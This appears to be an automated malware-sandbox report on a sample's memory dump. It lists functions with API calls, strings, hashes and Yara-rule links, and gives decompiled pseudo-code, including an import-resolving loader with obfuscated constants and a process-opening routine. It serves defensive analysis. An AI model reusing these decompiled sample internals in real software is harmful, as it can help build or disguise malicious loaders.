Part of subcall function 6D4BDE57: _abort.LIBCMT ref: 6D4BDED5

Part of subcall function 6D4BDE57: _free.LIBCMT ref: 6D4BDEB6
Part of subcall function 6D4BDE57: SetLastError.KERNEL32(00000000), ref: 6D4BDEC3

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6D4CDF6D
IsValidCodePage.KERNEL32(00000000), ref: 6D4CDFC8
IsValidLocale.KERNEL32(?,00000001), ref: 6D4CDFD7
GetLocaleInfoW.KERNEL32(?,00001001,.Km,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 6D4CE01F
GetLocaleInfoW.KERNEL32(?,00001002,00000004,00000040), ref: 6D4CE03E

Strings

.Km, xrefs: 6D4CDF43, 6D4CDF96, 6D4CDF38
.Km, xrefs: 6D4CDE8A, 6D4CDE9A, 6D4CDF5A, 6D4CDEFC, 6D4CDEF1, 6D4CDEF4, 6D4CDEFF, 6D4CDF5D
.Km, xrefs: 6D4CDE77, 6D4CE016

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: .Km$.Km$.Km
API String ID: 745075371-3451765847
Opcode ID: 2352fd2f989ddcc43bf81c8af83a708986b6c52847f1c8a932762f57824107e6
Instruction ID: bbdfc5cfcde2771bc8d938c49f6fc1a364fff38656180e8b4437088aabd462c6
Opcode Fuzzy Hash: 2352fd2f989ddcc43bf81c8af83a708986b6c52847f1c8a932762f57824107e6
Instruction Fuzzy Hash: BB51717AA446069BEF10DFA5CC44FBE77B8BF95700F11456AE914E7240E7709D01CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CD50B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 6D4BDE57: GetLastError.KERNEL32(?,?,6D4B42CA,?,?,6D47A5FA,?,6D460074,6D534074,?,?,?,6D4FC880,000000FF), ref: 6D4BDE5B
Part of subcall function 6D4BDE57: _free.LIBCMT ref: 6D4BDE8E
Part of subcall function 6D4BDE57: SetLastError.KERNEL32(00000000), ref: 6D4BDECF
Part of subcall function 6D4BDE57: _abort.LIBCMT ref: 6D4BDED5

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D4BE835,?,?,?,?,6D4BE211,?,00000004), ref: 6D4CD5ED
_wcschr.LIBVCRUNTIME ref: 6D4CD67D
_wcschr.LIBVCRUNTIME ref: 6D4CD68B
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,5Km,00000000,?), ref: 6D4CD72E

Strings

5Km, xrefs: 6D4CD604, 6D4CD64C, 6D4CD6F4

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: 5Km
API String ID: 4212172061-3890798359
Opcode ID: f4b1c12ea5de5b9c797a6f6f07d86e80b464ff9e3bce2fc9627f74cce88d0382
Instruction ID: c7b4aa6cc9255ef32e1e0c6e84fd27d3a38a885c2bb9104d8a2fbe77972dba8b
Opcode Fuzzy Hash: f4b1c12ea5de5b9c797a6f6f07d86e80b464ff9e3bce2fc9627f74cce88d0382
Instruction Fuzzy Hash: F5613B79644206AAEB14EF35CC40FBA73ACEF85754F21442DEA19D7280EB70ED41C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CDC8D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,6D4CDFAC,?,00000000), ref: 6D4CDD26
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,6D4CDFAC,?,00000000), ref: 6D4CDD4F
GetACP.KERNEL32(?,?,6D4CDFAC,?,00000000), ref: 6D4CDD64

Strings

OCP, xrefs: 6D4CDCE1
ACP, xrefs: 6D4CDCAB

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 7966e76a23ff36527de6f8bdb65bd4ed158541b150fc0c2765a6ece1c690cbab
Instruction ID: afcc78d726148c01da03b54a7522da485126a0f8b0fb36e3f9a78dbf1537bf20
Opcode Fuzzy Hash: 7966e76a23ff36527de6f8bdb65bd4ed158541b150fc0c2765a6ece1c690cbab
Instruction Fuzzy Hash: 3321B22AAC4142AAD7258F18C940F9773B6FFC5B20B628465E909D7304F732DD42C792

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B3EDA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6D4B3FD2
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6D4B3FDC
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6D4B3FE9

Strings

^Km, xrefs: 6D4B3EDC

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: ^Km
API String ID: 3906539128-1844677095
Opcode ID: d6c45b5ff5bd0ece1d13ee73b9a04f01701c726f8eeee6153470ca9b604dbfd0
Instruction ID: cd2e0200362100516e66bf70fd4938679b4b61cbe588f2580bda20d9f7015413
Opcode Fuzzy Hash: d6c45b5ff5bd0ece1d13ee73b9a04f01701c726f8eeee6153470ca9b604dbfd0
Instruction Fuzzy Hash: 3331D47590121DABCB21DF29D888B9DBBB8BF08354F5141DAE41DAB250EB709F818F94

Uniqueness

Uniqueness Score: -1.00%

Function 6D451850, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D451850() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;
				void* _t12;

				_t8 =  *0x6d454130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6d45413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t12 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 > 0) {
						L5:
						 *0x6d45412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6d454128 = _t5;
						 *0x6d454130 = _t8;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6d454124 = _t6;
						if(_t6 == 0) {
							 *0x6d454124 =  *0x6d454124 | 0xffffffff;
						}
						return 0;
					} else {
						_t12 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x6d451851
0x6d45185f
0x6d451867
0x6d45186c
0x6d4518be
0x6d4518be
0x6d45186e
0x6d451876
0x6d45187e
0x6d45187e
0x6d4518ba
0x6d4518bc
0x00000000
0x00000000
0x00000000
0x6d451878
0x6d45187a
0x6d451880
0x6d451880
0x6d451885
0x6d451893
0x6d451898
0x6d45189e
0x6d4518a6
0x6d4518ab
0x6d4518ad
0x6d4518ad
0x6d4518b7
0x6d45187c
0x6d45187c
0x00000000
0x6d45187c
0x6d45187a

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D45164B,73B763F0), ref: 6D45185F
GetVersion.KERNEL32 ref: 6D45186E
GetCurrentProcessId.KERNEL32 ref: 6D451885
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D45189E

Memory Dump Source

Source File: 00000002.00000002.908012543.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000002.00000002.908006075.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908018975.000000006D453000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908028737.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.908034339.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 661b8b9ddb5be227407c84281b5efd5bfea619f47dec4dccfdbb6bd9c28920b4
Instruction ID: f7f5b4730bdfb0240792bb662fa1630a16f257b39744639ee865d043355938c0
Opcode Fuzzy Hash: 661b8b9ddb5be227407c84281b5efd5bfea619f47dec4dccfdbb6bd9c28920b4
Instruction Fuzzy Hash: F5F018716543119AEF50BF796C0DB943BB4E71FBA1F204355E589D92C8D370CC618B58

Uniqueness

Uniqueness Score: -1.00%

Function 6D451745, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D451745(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6d45414c;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6d451745
0x6d45174e
0x6d451753
0x6d451759
0x6d451762
0x6d451768
0x6d45176a
0x6d45176d
0x6d451772
0x6d451779
0x6d451779
0x6d45177d
0x6d451785
0x6d451788
0x00000000
0x00000000
0x6d45178e
0x6d451798
0x6d45179a
0x6d45179d
0x6d4517a0
0x6d4517a4
0x6d4517ac
0x6d4517ae
0x6d4517b1
0x6d451819
0x6d451819
0x6d45181d
0x00000000
0x00000000
0x6d4517b6
0x6d4517bc
0x6d4517be
0x6d4517d1
0x6d4517d4
0x6d4517d4
0x6d4517d4
0x6d4517d8
0x6d4517c0
0x6d4517c0
0x6d4517c8
0x6d4517ca
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4517ca
0x6d4517b8
0x6d4517b8
0x6d4517cc
0x6d4517cc
0x6d4517cc
0x6d4517db
0x6d4517de
0x6d4517e0
0x6d4517e7
0x6d4517e2
0x6d4517e2
0x6d4517e2
0x6d4517ef
0x6d4517f5
0x6d4517f7
0x6d451827
0x6d4517f9
0x6d4517f9
0x6d4517fc
0x6d4517fe
0x6d451806
0x6d451806
0x6d45180b
0x6d45180d
0x6d451814
0x6d451816
0x6d451816
0x6d451816
0x00000000
0x6d451816
0x00000000
0x6d4517f7
0x6d4517a6
0x6d4517a8
0x6d4517aa
0x00000000
0x00000000
0x6d4517aa
0x6d45182a
0x6d45182a
0x6d451831
0x6d451836
0x00000000
0x00000000
0x6d45183c
0x6d451847
0x00000000
0x6d451847
0x6d45183e
0x6d45183e
0x6d451844
0x00000000
0x6d451844
0x6d451772
0x6d451848
0x6d45184d

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6D45177D
GetProcAddress.KERNEL32(?,00000000), ref: 6D4517EF

Memory Dump Source

Source File: 00000002.00000002.908012543.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000002.00000002.908006075.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908018975.000000006D453000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908028737.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.908034339.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 2cefb6b14087b11f0ef95fd1fdf16fe0feb4d4077a5951ed6376367f1f09b0c2
Instruction ID: 2bc9f1e50f79f4efd880c454f3251cd083f9eca7f1e42aecfd85246bf06aed8c
Opcode Fuzzy Hash: 2cefb6b14087b11f0ef95fd1fdf16fe0feb4d4077a5951ed6376367f1f09b0c2
Instruction Fuzzy Hash: F7310075A0020A9FDB15CFA9C880EAEB7F8BF15304F2480AAD851E7340E770DE61CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D452375, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D452375(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6d454178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6d4541c0 = 1;
										__eflags =  *0x6d4541c0;
										if( *0x6d4541c0 != 0) {
											goto L60;
										}
										_t84 =  *0x6d454178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6d4541c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6d454178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6d454180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6d45417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6d454180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d454180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6d4541c0 = 1;
							__eflags =  *0x6d4541c0;
							if( *0x6d4541c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6d454180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6d454180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6d4541c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6d454180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6d454178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6d454180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d454180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6d45237f
0x6d452382
0x6d452388
0x6d4523a6
0x00000000
0x6d4523a6
0x6d452390
0x6d452399
0x6d45239f
0x6d4523ae
0x6d4523b1
0x6d4523b4
0x6d4523be
0x6d4523be
0x6d4523c0
0x6d4523c3
0x6d4523c5
0x6d4523c5
0x6d4523c7
0x6d4523ca
0x00000000
0x00000000
0x6d4523cc
0x6d4523ce
0x6d452434
0x6d452434
0x6d452592
0x00000000
0x6d452592
0x6d4523d0
0x6d4523d0
0x6d4523d4
0x6d4523d6
0x6d4523d6
0x6d4523d6
0x6d4523d6
0x6d4523d9
0x6d4523da
0x6d4523dd
0x6d4523dd
0x6d4523e1
0x6d4523e5
0x6d4523f3
0x6d4523f3
0x6d4523fb
0x6d452401
0x6d452403
0x6d452405
0x6d452415
0x6d452422
0x6d452426
0x6d45242b
0x6d45242d
0x6d4524ab
0x6d4524ab
0x6d45242f
0x6d45242f
0x6d45242f
0x6d4524ad
0x6d4524af
0x6d452590
0x6d452590
0x00000000
0x6d4524b5
0x6d4524b5
0x6d4524bc
0x00000000
0x00000000
0x6d4524c2
0x6d4524c6
0x6d452522
0x6d452524
0x6d45252c
0x6d45252e
0x6d452530
0x00000000
0x00000000
0x6d452532
0x6d452538
0x6d45253a
0x6d45253c
0x6d452551
0x6d452551
0x6d452553
0x6d452582
0x6d452589
0x00000000
0x6d452589
0x6d452557
0x6d452558
0x6d45255a
0x6d45255c
0x6d45255c
0x6d45255e
0x6d452560
0x6d452562
0x6d452576
0x6d452576
0x6d452579
0x6d45257b
0x6d45257b
0x6d45257c
0x6d45257c
0x00000000
0x6d452564
0x6d452564
0x6d452564
0x6d45256d
0x6d45256e
0x6d452570
0x6d452572
0x6d452572
0x00000000
0x6d452564
0x6d452562
0x6d45253e
0x6d452545
0x6d452545
0x6d452547
0x00000000
0x00000000
0x6d452549
0x6d45254a
0x6d45254d
0x6d45254f
0x00000000
0x00000000
0x00000000
0x6d45254f
0x00000000
0x6d452545
0x6d4524c8
0x6d4524cb
0x6d4524d0
0x00000000
0x00000000
0x6d4524d9
0x6d4524db
0x6d4524e1
0x00000000
0x00000000
0x6d4524e7
0x6d4524ed
0x00000000
0x00000000
0x6d4524f3
0x6d4524f5
0x6d4524fe
0x6d452502
0x00000000
0x00000000
0x6d452508
0x6d45250b
0x6d45250d
0x00000000
0x00000000
0x6d452514
0x6d452516
0x00000000
0x00000000
0x6d452518
0x6d45251c
0x00000000
0x00000000
0x00000000
0x6d45251c
0x00000000
0x00000000
0x00000000
0x6d452407
0x6d452407
0x6d452407
0x6d45240e
0x00000000
0x00000000
0x6d452410
0x6d452411
0x6d452413
0x00000000
0x00000000
0x00000000
0x6d452413
0x6d45243b
0x6d45243d
0x00000000
0x00000000
0x6d45244d
0x6d45244f
0x6d452451
0x00000000
0x00000000
0x6d452457
0x6d45245e
0x6d45248a
0x6d45248a
0x6d45248c
0x6d45248e
0x6d4524a2
0x6d4524a4
0x00000000
0x00000000
0x00000000
0x00000000
0x6d452490
0x6d452490
0x6d452490
0x6d452499
0x6d45249a
0x6d45249c
0x6d45249e
0x6d45249e
0x00000000
0x6d452490
0x6d452460
0x6d452463
0x6d452465
0x6d452477
0x6d452477
0x6d45247a
0x6d45247c
0x6d45247c
0x6d45247d
0x6d45247d
0x6d452483
0x00000000
0x00000000
0x00000000
0x00000000
0x6d452467
0x6d452467
0x6d452467
0x6d45246e
0x00000000
0x00000000
0x6d452470
0x6d452470
0x6d452471
0x00000000
0x00000000
0x00000000
0x6d452471
0x6d452473
0x6d452475
0x6d452488
0x00000000
0x00000000
0x00000000
0x6d452488
0x00000000
0x6d452475
0x6d4523e7
0x6d4523ea
0x6d4523ed
0x00000000
0x00000000
0x6d4523ef
0x6d4523f1
0x00000000
0x00000000
0x00000000
0x6d4523f1
0x6d4523b6
0x6d4523b8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6D452426

Memory Dump Source

Source File: 00000002.00000002.908012543.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000002.00000002.908006075.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908018975.000000006D453000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908028737.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.908034339.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: a172513cdb3437d678035be2f5b3df43565de29d2b1b93bfe0fd3c9fc4ba3b83
Instruction ID: 1d671a3f612be5eb138e4412a876c221b21b60d624beba15111075414e469d81
Opcode Fuzzy Hash: a172513cdb3437d678035be2f5b3df43565de29d2b1b93bfe0fd3c9fc4ba3b83
Instruction Fuzzy Hash: F361B4306146179BD739CE28C4D0F6937B5AB9B398B74853AD556DB280EF30DCA2CA90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CBC30, Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6D4CBC74

Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF61
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF73
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF85
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF97
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFA9
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFBB
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFCD
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFDF
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFF1
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC003
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC015
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC027
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC039

_free.LIBCMT ref: 6D4CBC69

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(?,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?,?), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CBC8B
_free.LIBCMT ref: 6D4CBCA0
_free.LIBCMT ref: 6D4CBCAB
_free.LIBCMT ref: 6D4CBCCD
_free.LIBCMT ref: 6D4CBCE0
_free.LIBCMT ref: 6D4CBCEE
_free.LIBCMT ref: 6D4CBCF9
_free.LIBCMT ref: 6D4CBD31
_free.LIBCMT ref: 6D4CBD38
_free.LIBCMT ref: 6D4CBD55
_free.LIBCMT ref: 6D4CBD6D

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: e30783bc724e0ab22ef163a5af8ac72329d5a4bc0ad61ec0d560dc0186cae01b
Instruction ID: 723a9988ff43810c956a1fc028de71134e3d95526f5fa90ba1f9796108423535
Opcode Fuzzy Hash: e30783bc724e0ab22ef163a5af8ac72329d5a4bc0ad61ec0d560dc0186cae01b
Instruction Fuzzy Hash: 6E314B796083069FEB209B75D944F6A77E9EF00325F31482DE959DB250EF35AC80CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C5B5F, Relevance: 13.8, APIs: 9, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

